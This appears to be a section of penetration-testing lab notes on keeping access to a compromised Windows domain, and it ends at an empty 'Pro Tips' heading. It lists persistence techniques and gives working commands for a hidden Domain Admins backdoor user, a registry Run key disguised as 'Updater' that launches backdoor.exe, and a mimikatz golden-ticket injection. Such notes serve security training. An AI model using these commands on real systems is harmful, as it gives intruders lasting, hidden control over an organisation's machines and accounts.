5b. Establishing Persistence

Goal: Maintain access to a compromised system across reboots, logoffs, or detection attempts.

Objectives

graph TD
    A[Privileged Access Achieved] --> B[Choose Persistence Method]
    B --> C[Create Local or Domain User]
    B --> D[Abuse Startup Tasks or Services]
    B --> E[Schedule Tasks or WMI Events]
    B --> F[Abuse GPO, ACLs, or RBCD]
    C --> G[Maintain Login Capability]
    D --> G
    E --> G
    F --> G

Techniques and Tools

Technique Tool/Command Notes Add Local Admin User net user /addnet localgroup administrators /add Adds hidden admin account Add Domain User Add-DomainUser, Add-DomainGroupMember Requires domain-level privileges Scheduled Task Backdoor schtasks /create, Register-ScheduledTask Executes payload at intervals or login WMI Event Subscription PowerShell, Eventvwr, WMIExplorer Triggers persistent payload on system events Registry Run Key reg add Executes payload on login (HKCU...\Run) GPO Abuse Modify existing GPO to run code or add users Requires write access to GPO ACL / DACL Abuse Get-DomainObjectACL, Set-Acl Add permissions to re-elevate later Service Modification Change binary path of existing service to malicious script Common, especially for restartable services Remote Scheduled Task or RDP schtasks /s , Enable-PSRemoting, RDP w/ creds Maintain access through legitimate tools Kerberos Ticket Injection Rubeus, mimikatz kerberos::ptt Golden/Silver tickets for long-term domain access

Example: Creating a Domain Backdoor User

net user pentest Temp123! /add
net group "Domain Admins" pentest /add /domain

Example: Add Persistence with Registry

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Users\Public\backdoor.exe"

Example: Golden Ticket with Mimikatz

kerberos::golden /user:hacker /domain:INLANEFREIGHT.LOCAL /sid:<domain_sid> /krbtgt:<ntlm_hash> /ptt

Pro Tips